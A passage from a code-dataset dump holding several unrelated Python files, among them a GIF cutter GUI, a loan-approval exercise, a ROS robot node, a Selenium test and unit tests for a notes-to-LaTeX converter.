display.appendtext(\"| |\\n\")\n display.appendtext(\"| --GIF CUTTER-- |\\n\")\n display.appendtext(\"|___________________________|\\n\")\n display.appendtext(\"\\n\")\n display.appendtext(\"Pulse \\'BUSCAR\\' para escoger archivo.\\nPulse \\'CARPETA\\' para escoger carpeta de destino.\\n\\n\")\n\ndisplay = Pmw.ScrolledText(ventana, hscrollmode='none',\n vscrollmode='dynamic', hull_relief='sunken',\n hull_background='gray20', hull_borderwidth=10,\n text_background='blue', text_width=73,\n text_foreground='green2', text_height=22,\n text_padx=10, text_pady=10, text_relief='groove',\n text_font=('Fixedsys', 10))\ndisplay.pack(padx=0,pady=0)\n\nbuttons = Pmw.ButtonBox(ventana,hull_background=\"LightBlue3\")\n\nbuttons.pack(fill='both', expand=1, padx=1, pady=1)\n\nbuttons.add('LIMPIAR',bg='light green',command=clear)\nbuttons.add('CARPETA',bg='light green',command=direc)\nbuttons.add('CONVERTIR',bg='light green',command=inicia_conv)\nbuttons.add('EXTRAER',bg='light green',command=iniciar_extract)\nbuttons.add('BUSCAR',bg='light green',command=busca)\nbuttons.add('RECORTAR',bg='light green',command=recorte)\n\nbuttons.alignbuttons()\n\ntexto_inicio()\n\nventana.mainloop()\n\n\n\n\n","sub_path":"GIF_Cutter3.1.py","file_name":"GIF_Cutter3.1.py","file_ext":"py","file_size_in_byte":7359,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"60"} +{"seq_id":"17053292","text":"# Escreva um programa para aprovar o empréstimo bancário para a compra de uma casa.\n# Pergunte o valor da casa, o salário do comprador e em quantos anos ele vai pagar.\n# A prestação mensal não pode exceder 30% do salário ou então o empréstimo será negado.\n\ncasa = float(input('Qual o valor da casa? R$'))\nsalario = float(input('Qual o seu salário? R$'))\nanos = int(input('Em quantos anos deseja pagar? '))\nparcela = casa / (anos*12)\nminimo = (salario*30) / 100\nprint('Uma casa de R${:.2f} parcelada em {} anos ficará em torno de R${:.2f} por mes e seu salario de R${:.2f}'.format(casa, anos, parcela, salario))\nif parcela <= minimo:\n print('Aprovado!Parabens seu emprestimo foi aprovado')\nelse:\n print('NEGADO! Não sera possivel fazer o emprestimo.')","sub_path":"Parte 2/curso_python_2/Desafios de aula/desafio 36.py","file_name":"desafio 36.py","file_ext":"py","file_size_in_byte":769,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"60"} +{"seq_id":"455961542","text":"#\n# Copyright (C) 2018-2022 S[&]T, The Netherlands.\n#\n\nfrom __future__ import absolute_import, division, print_function\n\nimport datetime\n\nNAIVE_DATE_FORMATS = [\n '%Y-%m-%d',\n '%Y%m%d',\n]\n\nNAIVE_DATETIME_FORMATS = [\n '%Y-%m-%dT%H:%M:%S.%f', '%Y-%m-%dT%H:%M:%S',\n '%Y%m%dT%H%M%S.%f', '%Y%m%dT%H%M%S',\n] + NAIVE_DATE_FORMATS\n\n\ndef parse_date(value):\n result = None\n for fmt in NAIVE_DATE_FORMATS:\n try:\n result = datetime.datetime.strptime(value, fmt).date()\n except:\n continue\n if result:\n break\n return result\n\n\ndef parse_datetime(value):\n result = None\n for fmt in NAIVE_DATETIME_FORMATS:\n try:\n result = datetime.datetime.strptime(value, fmt)\n except:\n continue\n if result:\n break\n return result\n","sub_path":"muninn_django/naiveutcdatetime/parse.py","file_name":"parse.py","file_ext":"py","file_size_in_byte":835,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"60"} +{"seq_id":"532082146","text":"#!/usr/bin/env python\nimport rospy\nfrom lab2.msg import balboaLL # import balboa message\nfrom lab2.msg import pid_input # import pid_input message\n\nPI = 3.14159265358979 # global variable for PI\n\ndef parse_balboa_msg(data, self):\n self.dist_current = data.encoderCountRight # unpack right encoder\n self.dist_target = rospy.get_param('distance/target') # get distance target from user\n self.dist_current = self.dist_current * self.DPC # convert encoder distance to mm\n\n self.ang_current = data.angleX # unpack angle X\n self.ang_target = rospy.get_param('angle/target') # get angle target from user\n self.ang_current = self.ang_current / 1000 # convert angle from millidegrees to degrees\n\n # Publish the current and target distance values\n self.dist_pid_input.source = 'distance'\n self.dist_pid_input.current = self.dist_current\n self.dist_pid_input.target = self.dist_target\n self.dist.publish(self.dist_pid_input)\n\n # Publish the current and target angle values\n self.ang_pid_input.source = 'angle'\n self.ang_pid_input.current = self.ang_current\n self.ang_pid_input.target = self.ang_target\n self.ang.publish(self.ang_pid_input)\n\nclass TheNode(object):\n # This class holds the rospy logic for sending pid_input messages\n # from a published balboa message and user input \n\n def __init__(self):\n\n rospy.init_node('remote_drive') # intialize node\n \n # initialize publisher node for distance PID controller\n self.dist = rospy.Publisher('/dist', pid_input, queue_size=10)\n\n self.dist_pid_input = pid_input() # default pid_input type\n self.dist_current = 0 # init current distance\n self.dist_target = rospy.get_param('distance/target') # init distance target\n\n # initialize publisher node for angle PID controller\n self.ang = rospy.Publisher('/ang', pid_input, queue_size=10)\n\n self.ang_pid_input = pid_input() # default pid_input type\n self.ang_current = 0 # init left angle\n self.ang_target = rospy.get_param('angle/target') # init angle target\n\n # Encoder count per revolution is gear motor ratio (3344/65)\n # times gearbox ratio (2.14/1) times encoder revolution (12/1)\n CPR = (3344 / 65) * 2.14 * 12\n\n # Distance per revolution is 2 PI times wheel radius (40 mm)\n distPR = 2*PI*40\n\n # Distance per encoder count is distPR / CPR\n self.DPC = distPR / CPR\n\n def main_loop(self):\n # initialize subscriber node for messages from balboa robot\n rospy.Subscriber('balboaLL', balboaLL, parse_balboa_msg, self)\n\n rospy.spin() # wait for messages\n\nif __name__ == '__main__':\n try:\n a = TheNode()\n a.main_loop()\n except rospy.ROSInterruptException:\n pass\n","sub_path":"scripts/controlled_drive.py","file_name":"controlled_drive.py","file_ext":"py","file_size_in_byte":2687,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"60"} +{"seq_id":"51478238","text":"\"\"\"Controls result list model and view.\"\"\"\n\nimport pickle\n\nfrom deltacompression.gui.views import chart_view\n\n\nclass ResultController(object):\n \"\"\"Controller responsible for updating results' model and view.\"\"\"\n def __init__(self, main_controller, panel, result_list):\n \"\"\"Creates ResultController object.\n\n Args:\n main_controller: instance of MainController.\n panel: instance of ResultPanel.\n result_list: list of ExperimentResult objects.\n \"\"\"\n self._main_controller = main_controller\n self._result_list = result_list\n self._panel = panel\n self._initSignals()\n self._ser_errors = (pickle.PickleError, AttributeError, EOFError,\n ImportError, IndexError, IOError)\n\n def _initSignals(self):\n self._panel.Bind(self._panel.EVT_ANALYSE, self._onAnalyseExperiments)\n self._panel.Bind(self._panel.EVT_LOAD, self._onLoadFile)\n self._panel.Bind(self._panel.EVT_SAVE, self._onSaveFile)\n\n def _checkValidity(self, results):\n if not results:\n return False\n ver = [n for n, _ in results[0].versions_with_results]\n for res in results:\n res_ver = [n for n, _ in res.versions_with_results]\n if ver != res_ver:\n return False\n return True\n\n def _getResults(self):\n checked = self._panel.getCheckedIndices()\n results = [self._result_list[i] for i in checked]\n return results\n\n def _onAnalyseExperiments(self, _):\n results = self._getResults()\n if not self._checkValidity(results):\n self._panel.onIncorrectItems()\n return\n\n chart = chart_view.BarChartView(results)\n chart.show()\n\n def _onLoadFile(self, _):\n path = self._panel.getPath()\n try:\n with open(path, \"r\") as fil:\n new_results = pickle.load(fil)\n for res in new_results:\n self._addResult(res)\n except self._ser_errors:\n self._panel.onLoadError()\n\n def _onSaveFile(self, _):\n path = self._panel.getPath()\n results = self._getResults()\n try:\n with open(path, \"w\") as fil:\n pickle.dump(results, fil)\n except self._ser_errors:\n self._panel.onSaveError()\n\n def _addResult(self, exp_result):\n self._panel.addResultToList(exp_result)\n self._result_list.append(exp_result)\n\n def onExperimentPerformed(self, exp_result):\n self._addResult(exp_result)\n","sub_path":"deltacompression/gui/controllers/result_controller.py","file_name":"result_controller.py","file_ext":"py","file_size_in_byte":2573,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"60"} +{"seq_id":"420289187","text":"from selenium import webdriver\nfrom selenium.webdriver.common.by import By\nfrom selenium.webdriver.common.keys import Keys\nfrom selenium.webdriver.support.ui import Select\nfrom selenium.common.exceptions import NoSuchElementException\nfrom selenium.common.exceptions import NoAlertPresentException\nfrom selenium.webdriver.support.ui import WebDriverWait\nfrom selenium.webdriver.support import expected_conditions as EC\nfrom selenium.webdriver.common.action_chains import ActionChains\nfrom selenium.webdriver.chrome.options import Options\nimport unittest, time, re, datetime\nimport os\nfrom dotenv import load_dotenv\nload_dotenv()\nfrom pathlib import Path # python3 only\nenv_path = '.env'\nload_dotenv(dotenv_path=env_path)\nfrom time import sleep\n\nclass Test_Category(unittest.TestCase):\n def setUp(self):\n self.driver = webdriver.Chrome()\n self.verificationErrors = []\n self.accept_next_alert = True\n \n def test_category_woman(self):\n\n driver = self.driver\n\n get_url = os.getenv(\"URL\")\n\n self.driver.get(get_url)\n time.sleep(5)\n element = WebDriverWait(driver, 5).until(\n EC.presence_of_element_located((By.XPATH, \"//img[@class='logo img-responsive']\"))\n )\n driver.fullscreen_window()\n\n print(\"Show URL Successfully\")\n\n hover_women = driver.find_element_by_xpath(\"//a[@title='Women']\")\n \n hover = ActionChains(driver).move_to_element(hover_women)\n hover.perform()\n time.sleep(5)\n print(\"success to redirect tab women\")\n\n hover_blouse = driver.find_element_by_xpath(\"/html[1]/body[1]/div[1]/div[1]/header[1]/div[3]/div[1]/div[1]/div[6]/ul[1]/li[1]/ul[1]\")\n blouse = driver.find_element_by_xpath(\"/html[1]/body[1]/div[1]/div[1]/header[1]/div[3]/div[1]/div[1]/div[6]/ul[1]/li[1]/ul[1]/li[1]/ul[1]/li[2]/a[1]\")\n blouse.click()\n\n time.sleep(3)\n\n text_category_blouse = driver.find_element_by_xpath(\"//span[@class='category-name']\")\n\n if text_category_blouse.text == 'Blouses':\n print(\"success detect\")\n else:\n print(\"not detected\")\n \n time.sleep(3)\n \n\n def is_element_present(self, how, what):\n try: self.driver.find_element(by=how, value=what)\n except NoSuchElementException as e: return False\n return True\n \n def is_alert_present(self):\n try: self.driver.switch_to_alert()\n except NoAlertPresentException as e: return False\n return True\n \n def close_alert_and_get_its_text(self):\n try:\n alert = self.driver.switch_to_alert()\n alert_text = alert.text\n if self.accept_next_alert:\n alert.accept()\n else:\n alert.dismiss()\n return alert_text\n finally: self.accept_next_alert = True\n\n\n def tearDown(self):\n self.driver.quit()\n self.assertEqual([], self.verificationErrors)\n\nif __name__ == \"__main__\":\n unittest.main()\n ","sub_path":"test_category_woman.py","file_name":"test_category_woman.py","file_ext":"py","file_size_in_byte":3005,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"60"} +{"seq_id":"3136287","text":"'''\r\n生成斐波那契数列的前20个数\r\n\r\nversion:0.1\r\nautor:233-wang-233\r\n'''\r\n# import array as np\r\n# a=0\r\n# b=1\r\n# for i in range(1,20):\r\n# a,b=b,a+b#############右边的 a, a+b 会返回一个tuple 然后这个左边的a, b 会分别赋值为这个tuple里的第一个和第二个\r\n# print(a)\r\n'''\r\n找出10000以内的完美数\r\n\r\nversion:0.1\r\nautor:233-wang-233\r\n'''\r\nimport math\r\n\r\n# for i in range(2,10000):\r\n# num = 0\r\n# for j in range(1,i-1):\r\n# m=i%j\r\n# if m==0:\r\n# num+=j\r\n# if num==i:\r\n# print(i)\r\n\r\n\r\n# import math\r\n#\r\n# for num in range(1, 10000):\r\n# result = 0\r\n# for factor in range(1, int(math.sqrt(num)) + 1):\r\n# if num % factor == 0:\r\n# result += factor\r\n# if factor > 1 and num // factor != factor:\r\n# result += num // factor\r\n# if result == num:\r\n# print(num)\r\n\r\n'''\r\n输出100以内的素数\r\n\r\nversion:0.1\r\nautor:233-wang-233\r\n'''\r\nprint(1)\r\nfor i in range(2,100):\r\n is_prime=True\r\n for j in range(2,int(math.sqrt(i))+1):\r\n if i%j==0:\r\n is_prime=False\r\n break\r\n if is_prime:\r\n print(i)\r\n","sub_path":"day3_test.py","file_name":"day3_test.py","file_ext":"py","file_size_in_byte":1186,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"60"} +{"seq_id":"269032765","text":"import unittest\nimport collections\n\nimport utils\nimport lineproc\nimport parser\nimport texgenerator\n\nimport constants as const\n\nclass TestUtils(unittest.TestCase):\n \"\"\"\n Utils is just a file containing a bunch of\n useful functions using in other files.\n\n \"\"\"\n\n def test_count_lchar(self):\n self.assertEqual(utils.count_lchar(\"t\", \"testing\"), 1)\n self.assertEqual(utils.count_lchar(\" \", \" second\"), 3)\n self.assertEqual(utils.count_lchar(\" \", \"nothing\"), 0)\n\n def test_is_prefix(self):\n self.assertEqual(utils.is_prefix(\"t\", \"testing\"), True)\n self.assertEqual(utils.is_prefix(\" \", \" second\"), True)\n self.assertEqual(utils.is_prefix(\" \", \"nothing\"), False)\n self.assertEqual(utils.is_prefix(\"\", \"\"), True)\n self.assertEqual(utils.is_prefix(\"test\", \"\"), False)\n\n def test_rm_prefix(self):\n self.assertEqual(utils.rm_prefix(\"t\", \"testing\"), \"esting\")\n self.assertEqual(utils.rm_prefix(\" \", \" second\"), \" second\")\n self.assertEqual(utils.rm_prefix(\"\", \"\"), \"\")\n\n with self.assertRaises(SystemExit):\n utils.rm_prefix(\".txt\", \"testing\")\n\n def test_is_suffix(self):\n self.assertEqual(utils.is_suffix(\".png\", \"file.png\"), True)\n self.assertEqual(utils.is_suffix(\".jpg\", \"another.jpg\"), True)\n self.assertEqual(utils.is_suffix(\".txt\", \"testing\"), False)\n self.assertEqual(utils.is_suffix(\"\", \"testing\"), True)\n\n def test_rm_suffix(self):\n self.assertEqual(utils.rm_suffix(\".png\", \"file.png\"), \"file\")\n self.assertEqual(utils.rm_suffix(\".jpg\", \"another.jpg\"), \"another\")\n self.assertEqual(utils.rm_suffix(\"ing\", \"testing\"), \"test\")\n self.assertEqual(utils.rm_suffix(\"\", \"testing\"), \"testing\")\n\n with self.assertRaises(SystemExit):\n utils.rm_suffix(\".txt\", \"testing\")\n\n def test_reverse_string(self):\n self.assertEqual(utils.reverse_string(\"file.png\"), \"gnp.elif\")\n self.assertEqual(utils.reverse_string(\"\"), \"\")\n self.assertEqual(utils.reverse_string(\" \"), \" \")\n\n def test_intersperse(self):\n self.assertEqual(utils.intersperse(\" \", \"str\"), \\\n ['s', ' ', 't', ' ', 'r'])\n self.assertEqual(utils.intersperse(2, [10, 12, 14]), \\\n [10, 2, 12, 2, 14])\n\n def test_flatten(self):\n self.assertEqual(utils.flatten(['s', 't', 'r']), \"str\")\n self.assertEqual(utils.flatten([1, 2, 3]), 6)\n\n def test_find_m(self):\n self.assertEqual(utils.find_m(\".abc\", \"1. test\"), 1)\n self.assertEqual(utils.find_m(\"1\", \"1. test\"), 0)\n self.assertEqual(utils.find_m(\"se\", \"1. test\"), 4)\n\nclass TestLineProc(unittest.TestCase):\n \"\"\"\n LineProc is a very cohesive class and file. It\n could all be done with just one method in a class\n but it's split up in different functions to help\n organize it. It does not follow good OOP principles.\n\n But that's okay because it solves a tricky but\n fairly small problem. This means that although each\n part in LineProc is difficult to test, it's fairly\n easy to test it as one big piece.\n\n \"\"\"\n\n def setUp(self):\n self.delims = const.delims.copy()\n\n line_maker = lineproc.LineProc(self.delims)\n self.make_line = line_maker.make_line\n\n def test_bold(self):\n bstr, bend = self.delims[const.ID_BOLD]\n\n tst1 = \"The third \"+bstr+\"word\"+bend+\" was bold.\"\n res1 = \"The third {\\\\bf word} was bold.\"\n self.assertEqual(self.make_line(tst1, 0), res1)\n\n tst2 = \"This $ has \"+bstr+\"two bold\"+bend+\" & words.\"\n res2 = \"This \\\\$ has {\\\\bf two bold} \\\\& words.\"\n self.assertEqual(self.make_line(tst2, 0), res2)\n\n def test_inline_math(self):\n mstr, mend = self.delims[const.ID_M_INL]\n\n tst1 = \"Let's have some math: \"+mstr+\"x + y = 3\"+mend+\".\"\n res1 = \"Let's have some math: $x + y = 3$.\"\n self.assertEqual(self.make_line(tst1, 0), res1)\n\n tst2 = \"Slightly more complicated: \"+mstr+\"x_{t}\\\\frac{1}{x}\"+mend+\".\"\n res2 = \"Slightly more complicated: $x_{t}\\\\frac{1}{x}$.\"\n self.assertEqual(self.make_line(tst2, 0), res2)\n\n def test_inline_verbatim(self):\n vstr, vend = self.delims[const.ID_V_INL]\n\n tst1 = \"Some verbatim now: \"+vstr+\"self.assertEqual\"+vend+\".\"\n res1 = \"Some verbatim now: \\\\verb;self.assertEqual;.\"\n self.assertEqual(self.make_line(tst1, 0), res1)\n\n tst2 = \"Some special # } characters \"+vstr+\"\\\\code #\"+vend+\".\"\n res2 = \"Some special \\\\# \\\\} characters \\\\verb;\\\\code #;.\"\n self.assertEqual(self.make_line(tst2, 0), res2)\n\n tst3 = \"Let's try some \"+vstr+\"\\\\ $\"+vend+\".\"\n res3 = \"Let's try some \\\\verb;\\\\ $;.\"\n self.assertEqual(self.make_line(tst3, 0), res3)\n\n def test_url(self):\n ustr, uend = self.delims[const.ID_URL]\n sep = self.delims[const.ID_SEPR]\n\n tst1 = \"A link to \"+ustr+\"Google \"+sep+\"http://google.ca\"+uend+\".\"\n res1 = \"A link to \\\\href{http://google.ca}{Google}.\"\n self.assertEqual(self.make_line(tst1, 0), res1)\n\n def test_raw_tex(self):\n rstr, rend = self.delims[const.ID_T_INL]\n\n tst1 = \"Let's have _ some raw tex: \"+rstr+\"\\\\bf{text}\"+rend+\".\"\n res1 = \"Let's have \\\\_ some raw tex: \\\\bf{text}.\"\n self.assertEqual(self.make_line(tst1, 0), res1)\n\n def test_missing(self):\n ustr, _ = self.delims[const.ID_URL]\n rstr, _ = self.delims[const.ID_T_INL]\n\n with self.assertRaises(SystemExit):\n tst1 = \"A link to \"+ustr+\"Google \"\n self.make_line(tst1, 0)\n\n tst2 = \"Let's have some raw tex: \"+rstr+\"\\\\bf{text}\"\n self.make_line(tst2, 0)\n\n def test_mixed(self):\n bstr, bend = self.delims[const.ID_BOLD]\n rstr, rend = self.delims[const.ID_T_INL]\n\n tst1 = bstr+\"Bold\"+bend+rstr+\"$ = $\"+rend+\"end.\"\n res1 = \"{\\\\bf Bold}$ = $end.\"\n self.assertEqual(self.make_line(tst1, 0), res1)\n\n tst2 = rstr+\"$x + y = 5$\"+rend+bstr+\"sum\"+bend\n res2 = \"$x + y = 5${\\\\bf sum}\"\n self.assertEqual(self.make_line(tst2, 0), res2)\n\n with self.assertRaises(SystemExit):\n tst3 = bstr+\"Bold\"+rstr+\"$ = $\"+rend+\"end.\"\n self.make_line(tst3, 0)\n\n tst4 = rstr+\"$x + y = 5$\"+rend+bstr+\"\\\\sum\"\n self.make_line(tst4, 0)\n\n def test_replacements(self):\n tst1 = \"This has all \\\\ the restricted tex { } $ symbols \" + \\\n \"& littered # % every_where\"\n res1 = \"This has all \\\\\\\\ the restricted tex \\\\{ \\\\} \\\\$ symbols \" + \\\n \"\\\\& littered \\\\# \\\\% every\\\\_where\"\n self.assertEqual(self.make_line(tst1, 0), res1)\n\nclass TestParse(unittest.TestCase):\n \"\"\"\n NotParse is a complicated class. It\n reads in the entire .not file and turns\n it into a key, value list that can be\n written as .tex later.\n\n Some parts of NotParse are fairly cohesive\n and can't be tested separately but most\n of it is testable.\n\n \"\"\"\n\n def setUp(self):\n self.delims = const.delims.copy()\n self.parser = parser.Parse(\"Test\", test_mode=True)\n\n def test_get_header(self):\n sep = self.delims[const.ID_SEPR]\n\n # Basic settings test.\n tst1 = [const.ID_HDR_TIT+\"=Testing Headers\\n\", \\\n const.ID_HDR_AUT+\"=Test\\n\", \\\n const.ID_HDR_DAT+\"=\\n\", \\\n \"\\n\"]\n\n res1 = [[(const.ID_HDR_TIT, \"Testing Headers\"), \\\n (const.ID_HDR_AUT, \"Test\"), \\\n (const.ID_HDR_DAT, \"\")]]\n\n self.parser.raw_idx = 0\n self.parser.raw_text = tst1\n self.assertEqual(self.parser._get_header(), res1)\n\n\n # Test cutoff lines.\n tst2 = [const.ID_HDR_TIT+\"=Testing Headers\\n\", \\\n const.ID_HDR_AUT+\"=Test\"+sep+\"\\n\", \\\n \"Bob\"+sep+\"\\n\", \\\n \"Tom\"+sep+\"\\n\", \\\n \"Lop\\n\", \\\n \"\\n\"]\n\n res2 = [[(const.ID_HDR_TIT, \"Testing Headers\"), \\\n (const.ID_HDR_AUT, \"Test\\nBob\\nTom\\nLop\")]]\n\n self.parser.raw_idx = 0\n self.parser.raw_text = tst2\n self.assertEqual(self.parser._get_header(), res2)\n\n\n tst3 = [\"\\n\", \\\n const.ID_HDR_TIT+\"=Testing Empty Lines\\n\", \\\n \"\\n\"]\n\n res3 = [[(const.ID_HDR_TIT, \"Testing Empty Lines\")]]\n\n self.parser.raw_idx = 0\n self.parser.raw_text = tst3\n self.assertEqual(self.parser._get_header(), res3)\n\n with self.assertRaises(SystemExit):\n tst4 = [const.ID_HDR_TIT+\"=Testing Headers\\n\", \\\n \"Fake=Test\\n\", \\\n \"\\n\"]\n\n self.parser.raw_idx = 0\n self.parser.raw_text = tst4\n self.parser._get_header()\n\n\n def test_custom_delimeters(self):\n tst1 = [const.ID_HDR_TIT+\"=Testing Headers\\n\", \\\n const.ID_HDR_DLM+\"=\"+\\\n const.ID_TABLE+\":lmno,//\"+\\\n const.ID_BOLD+\":+s,s+//\"+\\\n const.ID_LIST_UNO+\":+,//\"+\\\n const.ID_M_INL+\":+%,%+\\n\",\n \"\\n\"]\n\n self.parser.raw_idx = 0\n self.parser.raw_text = tst1\n self.parser._get_header()\n self.assertEqual(self.parser.delims[const.ID_BOLD][0], \"+s\")\n self.assertEqual(self.parser.delims[const.ID_BOLD][1], \"s+\")\n self.assertEqual(self.parser.delims[const.ID_M_INL][0], \"+%\")\n self.assertEqual(self.parser.delims[const.ID_M_INL][1], \"%+\")\n self.assertEqual(self.parser.delims[const.ID_LIST_UNO], \"+\")\n self.assertEqual(self.parser.delims[const.ID_TABLE], \"lmno\")\n\n with self.assertRaises(SystemExit):\n tst2 = [const.ID_HDR_DLM+\"=\"+\\\n const.ID_TABLE+\":lmno,onml//\"+\\\n const.ID_M_INL+\":+%,%+\\n\",\n \"\\n\"]\n self.parser.raw_idx = 0\n self.parser.raw_text = tst2\n self.parser._get_header()\n\n def test_custom_setup(self):\n sep = self.delims[const.ID_SEPR]\n\n tst1 = [const.ID_HDR_TIT+\"=Testing Headers\\n\", \\\n const.ID_HDR_PAM+\"=\\\\documentclass[letter]{article}\"+sep+\"\\n\", \\\n \" \"*8 + \"\\\\begin{document}\\n\", \\\n \"\\n\"]\n\n res1 = [[(const.ID_HDR_PAM, \\\n \"\\\\documentclass[letter]{article}\\n\\\\begin{document}\\n\")]]\n\n self.parser.raw_idx = 0\n self.parser.raw_text = tst1\n self.assertEqual(self.parser._get_header(), res1)\n\n\n def test_is_section(self):\n sec1 = self.delims[const.ID_SEC_ONE]\n sec2 = self.delims[const.ID_SEC_TWO]\n sec3 = self.delims[const.ID_SEC_THR]\n\n self.assertEqual(self.parser._is_section(sec1+\"Blah\"), True)\n self.assertEqual(self.parser._is_section(sec2+\"Section\"), True)\n self.assertEqual(self.parser._is_section(sec3+\"Test\"), True)\n self.assertEqual(self.parser._is_section(\"& Blah\"), False)\n\n def test_is_list(self):\n uno_lst_delim = self.delims[const.ID_LIST_UNO]\n\n self.assertEqual(self.parser._is_list(uno_lst_delim+\" Blah\"), True)\n self.assertEqual(self.parser._is_list(uno_lst_delim+\"Section\"), True)\n self.assertEqual(self.parser._is_list(\"1.Test\"), True)\n self.assertEqual(self.parser._is_list(\"7.Test\"), True)\n self.assertEqual(self.parser._is_list(\".Test\"), False)\n self.assertEqual(self.parser._is_list(\" 7.Test\"), True)\n self.assertEqual(self.parser._is_list(\" \"*12+uno_lst_delim+\"Test\"), True)\n self.assertEqual(self.parser._is_list(\" \"*12+\"Test\"+uno_lst_delim+\"Blah\"), False)\n self.assertEqual(self.parser._is_list(\"Stuff 7.Test\"), False)\n self.assertEqual(self.parser._is_list(\"2Stuff. Test\"), False)\n\n def test_is_verbatim(self):\n vrb = self.delims[const.ID_V_BLK][0]\n\n self.assertEqual(self.parser._is_verbatim(vrb+\" Blah\"), True)\n self.assertEqual(self.parser._is_verbatim(vrb+\"Section\"), True)\n self.assertEqual(self.parser._is_verbatim(\"Test\"), False)\n\n def test_is_table(self):\n tbl = self.delims[const.ID_TABLE]\n\n self.assertEqual(self.parser._is_table(tbl+\" Blah\"), True)\n self.assertEqual(self.parser._is_table(tbl+\"Section\"), True)\n self.assertEqual(self.parser._is_table(\"Test\"), False)\n\n def test_is_image(self):\n img = self.delims[const.ID_IMAGE]\n\n self.assertEqual(self.parser._is_image(img+\" Blah\"), True)\n self.assertEqual(self.parser._is_image(img+\"Section\"), True)\n self.assertEqual(self.parser._is_image(\"Test\"), False)\n\n def test_is_raw_tex(self):\n rtex = self.delims[const.ID_T_BLK][0]\n\n self.assertEqual(self.parser._is_raw_tex(rtex+\" Blah\"), True)\n self.assertEqual(self.parser._is_raw_tex(rtex+\"Section\"), True)\n self.assertEqual(self.parser._is_raw_tex(\"Test\"), False)\n\n def test_make_section(self):\n sec1 = self.delims[const.ID_SEC_ONE]\n sec2 = self.delims[const.ID_SEC_TWO]\n sec3 = self.delims[const.ID_SEC_THR]\n\n tsts = [sec1+\"Test One\\n\", \\\n sec2+\"Test Two\\n\", \\\n sec3+\"Test Three\\n\"]\n\n ress = [[const.ID_SEC, [const.ID_SEC_ONE, \"Test One\"]], \\\n [const.ID_SEC, [const.ID_SEC_TWO, \"Test Two\"]], \\\n [const.ID_SEC, [const.ID_SEC_THR, \"Test Three\"]]]\n\n self.parser.raw_idx = 0\n self.parser.raw_text = tsts\n\n self.assertEqual(self.parser._make_section(), ress[0])\n self.assertEqual(self.parser._make_section(), ress[1])\n self.assertEqual(self.parser._make_section(), ress[2])\n\n def test_make_verbatim(self):\n vstr, vend = self.delims[const.ID_V_BLK]\n\n tst1 = [vstr+\"Test Caption\\n\", \\\n \"def test_make_verbatim(self):\\n\", \\\n \" pass\"+vend]\n res1 = [const.ID_V_BLK, [\"Test Caption\", \\\n [\"def test_make_verbatim(self):\", \" pass\"]]]\n\n self.parser.raw_idx = 0\n self.parser.raw_text = tst1\n self.assertEqual(self.parser._make_verbatim(), res1)\n\n tst2 = [vstr+\"Another Test\\n\", \\\n \" def test_indentation(self):\\n\", \\\n \" 8 spaces\"+vend]\n res2 = [const.ID_V_BLK, [\"Another Test\", \\\n [\" def test_indentation(self):\", \" 8 spaces\"]]]\n\n self.parser.raw_idx = 0\n self.parser.raw_text = tst2\n self.assertEqual(self.parser._make_verbatim(), res2)\n\n tst3 = [\" \"*8+vstr+\"Another Test\\n\", \\\n \" \"*8+\" def test_indentation(self):\\n\", \\\n \" \"*8+\" 8 spaces\"+vend]\n res3 = [const.ID_V_BLK, [\"Another Test\", \\\n [\" def test_indentation(self):\", \" 8 spaces\"]]]\n\n self.parser.raw_idx = 0\n self.parser.raw_text = tst3\n self.assertEqual(self.parser._make_verbatim(), res3)\n\n tst4 = [vstr+\"\\n\", \\\n \" def test_indentation(self):\\n\", \\\n \" 8 spaces\"+vend]\n res4 = [const.ID_V_BLK, [\"\", \\\n [\" def test_indentation(self):\", \" 8 spaces\"]]]\n\n self.parser.raw_idx = 0\n self.parser.raw_text = tst4\n self.assertEqual(self.parser._make_verbatim(), res4)\n\n\n\n def test_separate_lists(self):\n udlm = self.delims[const.ID_LIST_UNO]\n\n tst1 = [udlm+\"First level\", \\\n \" \"*4+udlm+\"Second level\", \\\n \" \"*8+udlm+\"Third level\", \\\n udlm+\"Back to first level\", \\\n \" \"*4+\"1. Numbered\", \\\n \" \"*8+\"2. Second numbered item\"]\n res1 = [const.ID_LIST_UNO, [\"First level\", \\\n [const.ID_LIST_UNO, [\"Second level\", \\\n [const.ID_LIST_UNO, [\"Third level\"]]]], \\\n \"Back to first level\", \\\n [const.ID_LIST_NUM, [\"Numbered\", \\\n [const.ID_LIST_NUM, [\"Second numbered item\"]]]]]]\n\n self.parser.raw_idx = 0\n self.parser.raw_text = tst1\n self.assertEqual(self.parser._separate_lists(tst1), (res1, 0))\n\n tst2 = [udlm+\"First\", \\\n \" \"*4+udlm+\"Second\", \\\n \"continuing a line.\", \\\n \" \"*8+udlm+\"Third\", \\\n \" longer on the third line\", \\\n \" plus a little more\", \\\n \" and done.\", \\\n udlm+\"First\"]\n res2 = [const.ID_LIST_UNO, [\"First\", \\\n [const.ID_LIST_UNO, [\"Second continuing a line.\", \\\n [const.ID_LIST_UNO, [\"Third longer on the third line \"+\\\n \"plus a little more and done.\"]]]], \\\n \"First\"]]\n\n self.parser.raw_idx = 0\n self.parser.raw_text = tst2\n self.assertEqual(self.parser._separate_lists(tst2), (res2, 4))\n\n with self.assertRaises(SystemExit):\n tst3 = [udlm+\"First\", \\\n \" \"*4+udlm+\"Second\", \\\n \" \"*8+udlm+\"Third\", \\\n \" \"*12+udlm+\"Fourth\", \\\n \" \"*16+udlm+\"Fifth\"]\n\n self.parser.raw_idx = 0\n self.parser.raw_text = tst3\n self.parser._separate_lists(tst3)\n\n\n def test_make_list(self):\n udlm = self.delims[const.ID_LIST_UNO]\n\n tst1 = [udlm+\"First\\n\", \\\n udlm+\"Second\\n\", \\\n \"\\n\"]\n res1 = [const.ID_LIST, [const.ID_LIST_UNO, [ \\\n \"First\", \"Second\"]]]\n\n self.parser.raw_idx = 0\n self.parser.raw_text = tst1\n self.assertEqual(self.parser._make_list(), res1)\n\n def test_make_image(self):\n img = self.delims[const.ID_IMAGE]\n sep = self.delims[const.ID_SEPR]\n\n tst1 = [img+\" Caption \"+sep+\" ../example/example_image.jpg\"]\n res1 = 